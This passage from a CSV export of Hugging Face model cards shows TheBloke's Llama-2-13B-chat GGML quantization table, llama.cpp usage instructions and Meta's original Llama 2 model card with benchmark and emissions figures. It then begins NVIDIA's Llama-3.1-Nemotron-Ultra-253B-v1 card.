| [llama-2-13b-chat.ggmlv3.q3_K_L.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q3_K_L.bin) | q3_K_L | 3 | 6.93 GB| 9.43 GB | New k-quant method. Uses GGML_TYPE_Q5_K for the attention.wv, attention.wo, and feed_forward.w2 tensors, else GGML_TYPE_Q3_K |
|
| 114 |
+
| [llama-2-13b-chat.ggmlv3.q4_0.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_0.bin) | q4_0 | 4 | 7.32 GB| 9.82 GB | Original quant method, 4-bit. |
|
| 115 |
+
| [llama-2-13b-chat.ggmlv3.q4_K_S.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_K_S.bin) | q4_K_S | 4 | 7.37 GB| 9.87 GB | New k-quant method. Uses GGML_TYPE_Q4_K for all tensors |
|
| 116 |
+
| [llama-2-13b-chat.ggmlv3.q4_K_M.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_K_M.bin) | q4_K_M | 4 | 7.87 GB| 10.37 GB | New k-quant method. Uses GGML_TYPE_Q6_K for half of the attention.wv and feed_forward.w2 tensors, else GGML_TYPE_Q4_K |
|
| 117 |
+
| [llama-2-13b-chat.ggmlv3.q4_1.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q4_1.bin) | q4_1 | 4 | 8.14 GB| 10.64 GB | Original quant method, 4-bit. Higher accuracy than q4_0 but not as high as q5_0. However has quicker inference than q5 models. |
|
| 118 |
+
| [llama-2-13b-chat.ggmlv3.q5_0.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_0.bin) | q5_0 | 5 | 8.95 GB| 11.45 GB | Original quant method, 5-bit. Higher accuracy, higher resource usage and slower inference. |
|
| 119 |
+
| [llama-2-13b-chat.ggmlv3.q5_K_S.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_K_S.bin) | q5_K_S | 5 | 8.97 GB| 11.47 GB | New k-quant method. Uses GGML_TYPE_Q5_K for all tensors |
|
| 120 |
+
| [llama-2-13b-chat.ggmlv3.q5_K_M.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_K_M.bin) | q5_K_M | 5 | 9.23 GB| 11.73 GB | New k-quant method. Uses GGML_TYPE_Q6_K for half of the attention.wv and feed_forward.w2 tensors, else GGML_TYPE_Q5_K |
|
| 121 |
+
| [llama-2-13b-chat.ggmlv3.q5_1.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q5_1.bin) | q5_1 | 5 | 9.76 GB| 12.26 GB | Original quant method, 5-bit. Even higher accuracy, resource usage and slower inference. |
|
| 122 |
+
| [llama-2-13b-chat.ggmlv3.q6_K.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q6_K.bin) | q6_K | 6 | 10.68 GB| 13.18 GB | New k-quant method. Uses GGML_TYPE_Q8_K for all tensors - 6-bit quantization |
|
| 123 |
+
| [llama-2-13b-chat.ggmlv3.q8_0.bin](https://huggingface.co/TheBloke/Llama-2-13B-chat-GGML/blob/main/llama-2-13b-chat.ggmlv3.q8_0.bin) | q8_0 | 8 | 13.83 GB| 16.33 GB | Original quant method, 8-bit. Almost indistinguishable from float16. High resource use and slow. Not recommended for most users. |
|
| 124 |
+
|
| 125 |
+
**Note**: the above RAM figures assume no GPU offloading. If layers are offloaded to the GPU, this will reduce RAM usage and use VRAM instead.
|
| 126 |
+
|
| 127 |
+
## How to run in `llama.cpp`
|
| 128 |
+
|
| 129 |
+
Make sure you are using `llama.cpp` from commit [dadbed99e65252d79f81101a392d0d6497b86caa](https://github.com/ggerganov/llama.cpp/commit/dadbed99e65252d79f81101a392d0d6497b86caa) or earlier.
|
| 130 |
+
|
| 131 |
+
For compatibility with latest llama.cpp, please use GGUF files instead.
|
| 132 |
+
|
| 133 |
+
```
|
| 134 |
+
./main -t 10 -ngl 32 -m llama-2-13b-chat.ggmlv3.q4_K_M.bin --color -c 2048 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""[INST] <<SYS>>\nYou are a helpful, respectful and honest assistant. Always answer as helpfully as possible, while being safe. Your answers should not include any harmful, unethical, racist, sexist, toxic, dangerous, or illegal content. Please ensure that your responses are socially unbiased and positive in nature. If a question does not make any sense, or is not factually coherent, explain why instead of answering something not correct. If you don't know the answer to a question, please don't share false information.\n<</SYS>>\nWrite a story about llamas[/INST]""
|
| 135 |
+
```
|
| 136 |
+
Change `-t 10` to the number of physical CPU cores you have. For example, if your system has 8 cores/16 threads, use `-t 8`.
|
| 137 |
+
|
| 138 |
+
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
|
| 139 |
+
|
| 140 |
+
Change `-c 2048` to the desired sequence length for this model. For example, `-c 4096` for a Llama 2 model. For models that use RoPE, add `--rope-freq-base 10000 --rope-freq-scale 0.5` for doubled context, or `--rope-freq-base 10000 --rope-freq-scale 0.25` for 4x context.
|
| 141 |
+
|
| 142 |
+
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
|
| 143 |
+
|
| 144 |
+
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
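For Python users, the same invocation can be approximated with llama-cpp-python, one of the compatible libraries listed above. A hedged sketch: only llama-cpp-python releases from the GGML era load ggmlv3 `.bin` files (later releases require GGUF), so treat the setup as illustrative rather than exact.

```py
# Illustrative sketch, assuming a GGML-era llama-cpp-python release.
from llama_cpp import Llama

llm = Llama(
    model_path="llama-2-13b-chat.ggmlv3.q4_K_M.bin",
    n_ctx=2048,       # matches -c 2048
    n_threads=10,     # matches -t 10; set to your physical core count
    n_gpu_layers=32,  # matches -ngl 32; use 0 without GPU acceleration
)
out = llm(
    "[INST] <<SYS>>\nYou are a helpful assistant.\n<</SYS>>\n"
    "Write a story about llamas[/INST]",
    max_tokens=512, temperature=0.7, repeat_penalty=1.1,
)
print(out["choices"][0]["text"])
```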
|
| 145 |
+
|
| 146 |
+
## How to run in `text-generation-webui`
|
| 147 |
+
|
| 148 |
+
Further instructions here: [text-generation-webui/docs/llama.cpp.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/llama.cpp.md).
|
| 149 |
+
|
| 150 |
+
<!-- footer start -->
|
| 151 |
+
<!-- 200823 -->
|
| 152 |
+
## Discord
|
| 153 |
+
|
| 154 |
+
For further support, and discussions on these models and AI in general, join us at:
|
| 155 |
+
|
| 156 |
+
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
|
| 157 |
+
|
| 158 |
+
## Thanks, and how to contribute.
|
| 159 |
+
|
| 160 |
+
Thanks to the [chirper.ai](https://chirper.ai) team!
|
| 161 |
+
|
| 162 |
+
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
|
| 163 |
+
|
| 164 |
+
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
|
| 165 |
+
|
| 166 |
+
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
|
| 167 |
+
|
| 168 |
+
* Patreon: https://patreon.com/TheBlokeAI
|
| 169 |
+
* Ko-Fi: https://ko-fi.com/TheBlokeAI
|
| 170 |
+
|
| 171 |
+
**Special thanks to**: Aemon Algiz.
|
| 172 |
+
|
| 173 |
+
**Patreon special mentions**: Russ Johnson, J, alfie_i, Alex, NimbleBox.ai, Chadd, Mandus, Nikolai Manek, Ken Nordquist, ya boyyy, Illia Dulskyi, Viktor Bowallius, vamX, Iucharbius, zynix, Magnesian, Clay Pascal, Pierre Kircher, Enrico Ros, Tony Hughes, Elle, Andrey, knownsqashed, Deep Realms, Jerry Meng, Lone Striker, Derek Yates, Pyrater, Mesiah Bishop, James Bentley, Femi Adebogun, Brandon Frisco, SuperWojo, Alps Aficionado, Michael Dempsey, Vitor Caleffi, Will Dee, Edmond Seymore, usrbinkat, LangChain4j, Kacper Wikieł, Luke Pendergrass, John Detwiler, theTransient, Nathan LeClaire, Tiffany J. Kim, biorpg, Eugene Pentland, Stanislav Ovsiannikov, Fred von Graf, terasurfer, Kalila, Dan Guido, Nitin Borwankar, 阿明, Ai Maven, John Villwock, Gabriel Puliatti, Stephen Murray, Asp the Wyvern, danny, Chris Smitley, ReadyPlayerEmma, S_X, Daniel P. Andersen, Olakabola, Jeffrey Morgan, Imad Khwaja, Caitlyn Gatomon, webtim, Alicia Loh, Trenton Dambrowitz, Swaroop Kallakuri, Erik Bjäreholt, Leonard Tan, Spiking Neurons AB, Luke @flexchar, Ajan Kanaga, Thomas Belote, Deo Leter, RoA, Willem Michiel, transmissions 11, subjectnull, Matthew Berman, Joseph William Delisle, David Ziegler, Michael Davis, Johann-Peter Hartmann, Talal Aujan, senxiiz, Artur Olbinski, Rainer Wilmers, Spencer Kim, Fen Risland, Cap'n Zoog, Rishabh Srivastava, Michael Levine, Geoffrey Montalvo, Sean Connelly, Alexandros Triantafyllidis, Pieter, Gabriel Tamborski, Sam, Subspace Studios, Junyu Yang, Pedro Madruga, Vadim, Cory Kujawski, K, Raven Klaugh, Randy H, Mano Prime, Sebastain Graf, Space Cruiser
|
| 174 |
+
|
| 175 |
+
|
| 176 |
+
Thank you to all my generous patrons and donaters!
|
| 177 |
+
|
| 178 |
+
And thank you again to a16z for their generous grant.
|
| 179 |
+
|
| 180 |
+
<!-- footer end -->
|
| 181 |
+
|
| 182 |
+
# Original model card: Meta's Llama 2 13B-chat
|
| 183 |
+
|
| 184 |
+
# **Llama 2**
|
| 185 |
+
Llama 2 is a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. This is the repository for the 13B fine-tuned model, optimized for dialogue use cases and converted for the Hugging Face Transformers format. Links to other models can be found in the index at the bottom.
|
| 186 |
+
|
| 187 |
+
## Model Details
|
| 188 |
+
*Note: Use of this model is governed by the Meta license. In order to download the model weights and tokenizer, please visit the [website](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) and accept our License before requesting access here.*
|
| 189 |
+
|
| 190 |
+
Meta developed and publicly released the Llama 2 family of large language models (LLMs), a collection of pretrained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. Our fine-tuned LLMs, called Llama-2-Chat, are optimized for dialogue use cases. Llama-2-Chat models outperform open-source chat models on most benchmarks we tested, and in our human evaluations for helpfulness and safety, are on par with some popular closed-source models like ChatGPT and PaLM.
|
| 191 |
+
|
| 192 |
+
**Model Developers** Meta
|
| 193 |
+
|
| 194 |
+
**Variations** Llama 2 comes in a range of parameter sizes — 7B, 13B, and 70B — as well as pretrained and fine-tuned variations.
|
| 195 |
+
|
| 196 |
+
**Input** Models input text only.
|
| 197 |
+
|
| 198 |
+
**Output** Models generate text only.
|
| 199 |
+
|
| 200 |
+
**Model Architecture** Llama 2 is an auto-regressive language model that uses an optimized transformer architecture. The tuned versions use supervised fine-tuning (SFT) and reinforcement learning with human feedback (RLHF) to align to human preferences for helpfulness and safety.
|
| 201 |
+
|
| 202 |
+
|
| 203 |
+
||Training Data|Params|Content Length|GQA|Tokens|LR|
|
| 204 |
+
|---|---|---|---|---|---|---|
|
| 205 |
+
|Llama 2|*A new mix of publicly available online data*|7B|4k|✗|2.0T|3.0 x 10<sup>-4</sup>|
|
| 206 |
+
|Llama 2|*A new mix of publicly available online data*|13B|4k|✗|2.0T|3.0 x 10<sup>-4</sup>|
|
| 207 |
+
|Llama 2|*A new mix of publicly available online data*|70B|4k|✔|2.0T|1.5 x 10<sup>-4</sup>|
|
| 208 |
+
|
| 209 |
+
*Llama 2 family of models.* Token counts refer to pretraining data only. All models are trained with a global batch-size of 4M tokens. Bigger models (70B) use Grouped-Query Attention (GQA) for improved inference scalability.
|
| 210 |
+
|
| 211 |
+
**Model Dates** Llama 2 was trained between January 2023 and July 2023.
|
| 212 |
+
|
| 213 |
+
**Status** This is a static model trained on an offline dataset. Future versions of the tuned models will be released as we improve model safety with community feedback.
|
| 214 |
+
|
| 215 |
+
**License** A custom commercial license is available at: [https://ai.meta.com/resources/models-and-libraries/llama-downloads/](https://ai.meta.com/resources/models-and-libraries/llama-downloads/)
|
| 216 |
+
|
| 217 |
+
**Research Paper** [""Llama-2: Open Foundation and Fine-tuned Chat Models""](https://arxiv.org/abs/2307.09288)
|
| 218 |
+
|
| 219 |
+
## Intended Use
|
| 220 |
+
**Intended Use Cases** Llama 2 is intended for commercial and research use in English. Tuned models are intended for assistant-like chat, whereas pretrained models can be adapted for a variety of natural language generation tasks.
|
| 221 |
+
|
| 222 |
+
To get the expected features and performance for the chat versions, a specific formatting needs to be followed, including the `INST` and `<<SYS>>` tags, `BOS` and `EOS` tokens, and the whitespaces and breaklines in between (we recommend calling `strip()` on inputs to avoid double-spaces). See our reference code in github for details: [`chat_completion`](https://github.com/facebookresearch/llama/blob/main/llama/generation.py#L212).
|
| 223 |
+
|
| 224 |
+
**Out-of-scope Uses** Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in languages other than English. Use in any other way that is prohibited by the Acceptable Use Policy and Licensing Agreement for Llama 2.
|
| 225 |
+
|
| 226 |
+
## Hardware and Software
|
| 227 |
+
**Training Factors** We used custom training libraries, Meta's Research Super Cluster, and production clusters for pretraining. Fine-tuning, annotation, and evaluation were also performed on third-party cloud compute.
|
| 228 |
+
|
| 229 |
+
**Carbon Footprint** Pretraining utilized a cumulative 3.3M GPU hours of computation on hardware of type A100-80GB (TDP of 350-400W). Estimated total emissions were 539 tCO2eq, 100% of which were offset by Meta’s sustainability program.
|
| 230 |
+
|
| 231 |
+
||Time (GPU hours)|Power Consumption (W)|Carbon Emitted(tCO<sub>2</sub>eq)|
|
| 232 |
+
|---|---|---|---|
|
| 233 |
+
|Llama 2 7B|184320|400|31.22|
|
| 234 |
+
|Llama 2 13B|368640|400|62.44|
|
| 235 |
+
|Llama 2 70B|1720320|400|291.42|
|
| 236 |
+
|Total|3311616||539.00|
|
| 237 |
+
|
| 238 |
+
**CO<sub>2</sub> emissions during pretraining.** Time: total GPU time required for training each model. Power Consumption: peak power capacity per GPU device for the GPUs used adjusted for power usage efficiency. 100% of the emissions are directly offset by Meta's sustainability program, and because we are openly releasing these models, the pretraining costs do not need to be incurred by others.
|
| 239 |
+
|
| 240 |
+
## Training Data
|
| 241 |
+
**Overview** Llama 2 was pretrained on 2 trillion tokens of data from publicly available sources. The fine-tuning data includes publicly available instruction datasets, as well as over one million new human-annotated examples. Neither the pretraining nor the fine-tuning datasets include Meta user data.
|
| 242 |
+
|
| 243 |
+
**Data Freshness** The pretraining data has a cutoff of September 2022, but some tuning data is more recent, up to July 2023.
|
| 244 |
+
|
| 245 |
+
## Evaluation Results
|
| 246 |
+
|
| 247 |
+
In this section, we report the results for the Llama 1 and Llama 2 models on standard academic benchmarks. For all the evaluations, we use our internal evaluations library.
|
| 248 |
+
|
| 249 |
+
|Model|Size|Code|Commonsense Reasoning|World Knowledge|Reading Comprehension|Math|MMLU|BBH|AGI Eval|
|
| 250 |
+
|---|---|---|---|---|---|---|---|---|---|
|
| 251 |
+
|Llama 1|7B|14.1|60.8|46.2|58.5|6.95|35.1|30.3|23.9|
|
| 252 |
+
|Llama 1|13B|18.9|66.1|52.6|62.3|10.9|46.9|37.0|33.9|
|
| 253 |
+
|Llama 1|33B|26.0|70.0|58.4|67.6|21.4|57.8|39.8|41.7|
|
| 254 |
+
|Llama 1|65B|30.7|70.7|60.5|68.6|30.8|63.4|43.5|47.6|
|
| 255 |
+
|Llama 2|7B|16.8|63.9|48.9|61.3|14.6|45.3|32.6|29.3|
|
| 256 |
+
|Llama 2|13B|24.5|66.9|55.4|65.8|28.7|54.8|39.4|39.1|
|
| 257 |
+
|Llama 2|70B|**37.5**|**71.9**|**63.6**|**69.4**|**35.2**|**68.9**|**51.2**|**54.2**|
|
| 258 |
+
|
| 259 |
+
**Overall performance on grouped academic benchmarks.** *Code:* We report the average pass@1 scores of our models on HumanEval and MBPP. *Commonsense Reasoning:* We report the average of PIQA, SIQA, HellaSwag, WinoGrande, ARC easy and challenge, OpenBookQA, and CommonsenseQA. We report 7-shot results for CommonSenseQA and 0-shot results for all other benchmarks. *World Knowledge:* We evaluate the 5-shot performance on NaturalQuestions and TriviaQA and report the average. *Reading Comprehension:* For reading comprehension, we report the 0-shot average on SQuAD, QuAC, and BoolQ. *MATH:* We report the average of the GSM8K (8 shot) and MATH (4 shot) benchmarks at top 1.
|
| 260 |
+
|
| 261 |
+
|||TruthfulQA|Toxigen|
|
| 262 |
+
|---|---|---|---|
|
| 263 |
+
|Llama 1|7B|27.42|23.00|
|
| 264 |
+
|Llama 1|13B|41.74|23.08|
|
| 265 |
+
|Llama 1|33B|44.19|22.57|
|
| 266 |
+
|Llama 1|65B|48.71|21.77|
|
| 267 |
+
|Llama 2|7B|33.29|**21.25**|
|
| 268 |
+
|Llama 2|13B|41.86|26.10|
|
| 269 |
+
|Llama 2|70B|**50.18**|24.60|
|
| 270 |
+
|
| 271 |
+
**Evaluation of pretrained LLMs on automatic safety benchmarks.** For TruthfulQA, we present the percentage of generations that are both truthful and informative (the higher the better). For ToxiGen, we present the percentage of toxic generations (the smaller the better).
|
| 272 |
+
|
| 273 |
+
|
| 274 |
+
|||TruthfulQA|Toxigen|
|
| 275 |
+
|---|---|---|---|
|
| 276 |
+
|Llama-2-Chat|7B|57.04|**0.00**|
|
| 277 |
+
|Llama-2-Chat|13B|62.18|**0.00**|
|
| 278 |
+
|Llama-2-Chat|70B|**64.14**|0.01|
|
| 279 |
+
|
| 280 |
+
**Evaluation of fine-tuned LLMs on different safety datasets.** Same metric definitions as above.
|
| 281 |
+
|
| 282 |
+
## Ethical Considerations and Limitations
|
| 283 |
+
Llama 2 is a new technology that carries risks with use. Testing conducted to date has been in English, and has not covered, nor could it cover all scenarios. For these reasons, as with all LLMs, Llama 2’s potential outputs cannot be predicted in advance, and the model may in some instances produce inaccurate, biased or other objectionable responses to user prompts. Therefore, before deploying any applications of Llama 2, developers should perform safety testing and tuning tailored to their specific applications of the model.
|
| 284 |
+
|
| 285 |
+
Please see the Responsible Use Guide available at [https://ai.meta.com/llama/responsible-use-guide/](https://ai.meta.com/llama/responsible-use-guide/).
|
| 286 |
+
|
| 287 |
+
## Reporting Issues
|
| 288 |
+
Please report any software “bug,” or other problems with the models through one of the following means:
|
| 289 |
+
- Reporting issues with the model: [github.com/facebookresearch/llama](http://github.com/facebookresearch/llama)
|
| 290 |
+
- Reporting problematic content generated by the model: [developers.facebook.com/llama_output_feedback](http://developers.facebook.com/llama_output_feedback)
|
| 291 |
+
- Reporting bugs and security concerns: [facebook.com/whitehat/info](http://facebook.com/whitehat/info)
|
| 292 |
+
|
| 293 |
+
## Llama Model Index
|
| 294 |
+
|Model|Llama2|Llama2-hf|Llama2-chat|Llama2-chat-hf|
|
| 295 |
+
|---|---|---|---|---|
|
| 296 |
+
|7B| [Link](https://huggingface.co/llamaste/Llama-2-7b) | [Link](https://huggingface.co/llamaste/Llama-2-7b-hf) | [Link](https://huggingface.co/llamaste/Llama-2-7b-chat) | [Link](https://huggingface.co/llamaste/Llama-2-7b-chat-hf)|
|
| 297 |
+
|13B| [Link](https://huggingface.co/llamaste/Llama-2-13b) | [Link](https://huggingface.co/llamaste/Llama-2-13b-hf) | [Link](https://huggingface.co/llamaste/Llama-2-13b-chat) | [Link](https://huggingface.co/llamaste/Llama-2-13b-hf)|
|
| 298 |
+
|70B| [Link](https://huggingface.co/llamaste/Llama-2-70b) | [Link](https://huggingface.co/llamaste/Llama-2-70b-hf) | [Link](https://huggingface.co/llamaste/Llama-2-70b-chat) | [Link](https://huggingface.co/llamaste/Llama-2-70b-hf)|
|
| 299 |
+
","{""id"": ""TheBloke/Llama-2-13B-chat-GGML"", ""author"": ""TheBloke"", ""sha"": ""3140827b4dfcb6b562cd87ee3d7f07109b014dd0"", ""last_modified"": ""2023-09-27 13:00:18+00:00"", ""created_at"": ""2023-07-18 18:03:26+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 315, ""downloads_all_time"": null, ""likes"": 697, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""llama"", ""facebook"", ""meta"", ""pytorch"", ""llama-2"", ""text-generation"", ""en"", ""arxiv:2307.09288"", ""base_model:meta-llama/Llama-2-13b-chat-hf"", ""base_model:finetune:meta-llama/Llama-2-13b-chat-hf"", ""license:other"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: meta-llama/Llama-2-13b-chat-hf\nlanguage:\n- en\nlicense: other\nmodel_name: Llama 2 13B Chat\npipeline_tag: text-generation\ntags:\n- facebook\n- meta\n- pytorch\n- llama\n- llama-2\ninference: false\nmodel_creator: Meta Llama 2\nmodel_link: https://huggingface.co/meta-llama/Llama-2-13b-chat-hf\nmodel_type: llama\nquantized_by: TheBloke"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""model_type"": ""llama""}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Notice', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='USE_POLICY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q2_K.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q3_K_L.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q3_K_M.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q3_K_S.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_0.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_1.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_K_M.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_K_S.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_0.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_1.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_K_M.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_K_S.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q6_K.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q8_0.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""mikeee/llama2-7b-chat-uncensored-ggml"", 
""memef4rmer/llama2-7b-chat-uncensored-ggml"", ""Nymbo/llama2-7b-chat-uncensored-ggml"", ""mikeee/nousresearch-nous-hermes-llama2-13b-ggml"", ""gsaivinay/Llama-2-13B-GGML-server"", ""mikeee/llama2-7b-chat-ggml"", ""rodevel1978/llama-2-13b-chat.ggmlv3.q4_K_S"", ""PSMdata/langchain-llama2-7b-chat"", ""ankanpy/LlamaGPT"", ""DHEIVER/VestibulaIA"", ""mikeee/langchain-llama2-7b-chat-uncensored-ggml"", ""K00B404/langchain-llama2-7b-chat-uncensored-ggml"", ""imenayadi/Smart-inbox"", ""jorgefio/Case-Classification-Llama-2"", ""lavanjv/vec-digichat"", ""TogetherAI/llahrou"", ""ndn1954/pdfchatbot"", ""AinzOoalGowns/llama2-7b-chat-uncensored-test"", ""Jafta/llama2-7b-chat-ggml"", ""Awe03/ai"", ""jingwora/llama2-7b-chat-ggml"", ""yuping322/LLaMA-2-CHAT"", ""dnzengou/llama-gpt-chatbot"", ""cpereira/ask-a-bot"", ""JohnTan38/llama-2-7b-chat-1"", ""Y0R6/Comet_chatbot2.0"", ""gauravprasadgp/genai"", ""GaboDataScientist/Open_LLM"", ""Dalleon/llama2-7b-chat-uncensored-ggml"", ""brunodoti/turing-20.0"", ""Jayem-11/LLama2_gguf"", ""Skizzy-create/Ona-quantized-LLAMA"", ""kellyshreeve/QA-chatbot"", ""sanket09/llama-2-7b-chat"", ""Antonio49/llama-2-7b-chat"", ""salomonsky/llama"", ""patelankita/TextSummary"", ""LucasMendes/llama2-7b-chat-uncensored-ggml"", ""pvucontroller/llama2-7b-chat-uncensored-ggml"", ""lockp111/llama2-7b-chat-uncensored-ggml"", ""Ashrafb/llama-2-7b-chatttt"", ""ubermenchh/arxiv-retrieval"", ""dkazuma/testajah"", ""SlyFox29/Colonial_llama2"", ""geoffhorowitz/gradio_sandbox"", ""Leco1701/LENRapi"", ""patelankita/PythonCodeGenerator"", ""sachin1826/blog_generator"", ""SansarK/SansarChat"", ""ThiseniSenethma/llama-emotion-app""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-09-27 13:00:18+00:00"", ""cardData"": ""base_model: meta-llama/Llama-2-13b-chat-hf\nlanguage:\n- en\nlicense: other\nmodel_name: Llama 2 13B Chat\npipeline_tag: text-generation\ntags:\n- facebook\n- meta\n- pytorch\n- llama\n- llama-2\ninference: false\nmodel_creator: Meta Llama 2\nmodel_link: https://huggingface.co/meta-llama/Llama-2-13b-chat-hf\nmodel_type: llama\nquantized_by: TheBloke"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""64b6d3eeab056b63ede8a758"", ""modelId"": ""TheBloke/Llama-2-13B-chat-GGML"", ""usedStorage"": 116526450432}",0,,0,,0,,0,,0,"Ashrafb/llama-2-7b-chatttt, DHEIVER/VestibulaIA, Nymbo/llama2-7b-chat-uncensored-ggml, PSMdata/langchain-llama2-7b-chat, ankanpy/LlamaGPT, gsaivinay/Llama-2-13B-GGML-server, huggingface/InferenceSupport/discussions/new?title=TheBloke/Llama-2-13B-chat-GGML&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTheBloke%2FLlama-2-13B-chat-GGML%5D(%2FTheBloke%2FLlama-2-13B-chat-GGML)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, memef4rmer/llama2-7b-chat-uncensored-ggml, mikeee/langchain-llama2-7b-chat-uncensored-ggml, mikeee/llama2-7b-chat-ggml, mikeee/llama2-7b-chat-uncensored-ggml, mikeee/nousresearch-nous-hermes-llama2-13b-ggml, rodevel1978/llama-2-13b-chat.ggmlv3.q4_K_S",13
|
Llama-3_1-Nemotron-Ultra-253B-v1_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
@@ -0,0 +1,369 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
nvidia/Llama-3_1-Nemotron-Ultra-253B-v1,"---
|
| 3 |
+
library_name: transformers
|
| 4 |
+
license: other
|
| 5 |
+
license_name: nvidia-open-model-license
|
| 6 |
+
license_link: >-
|
| 7 |
+
https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/
|
| 8 |
+
|
| 9 |
+
pipeline_tag: text-generation
|
| 10 |
+
language:
|
| 11 |
+
- en
|
| 12 |
+
tags:
|
| 13 |
+
- nvidia
|
| 14 |
+
- llama-3
|
| 15 |
+
- pytorch
|
| 16 |
+
---
|
| 17 |
+
|
| 18 |
+
# Llama-3.1-Nemotron-Ultra-253B-v1
|
| 19 |
+
|
| 20 |
+
## Model Overview
|
| 21 |
+
|
| 22 |
+

|
| 23 |
+
|
| 24 |
+
Llama-3.1-Nemotron-Ultra-253B-v1 is a large language model (LLM) which is a derivative of [Meta Llama-3.1-405B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-405B-Instruct) (AKA the *reference model*). It is a reasoning model that is post-trained for reasoning, human chat preferences, and tasks such as RAG and tool calling. The model supports a context length of 128K tokens. This model fits on a single 8xH100 node for inference.
|
| 25 |
+
|
| 26 |
+
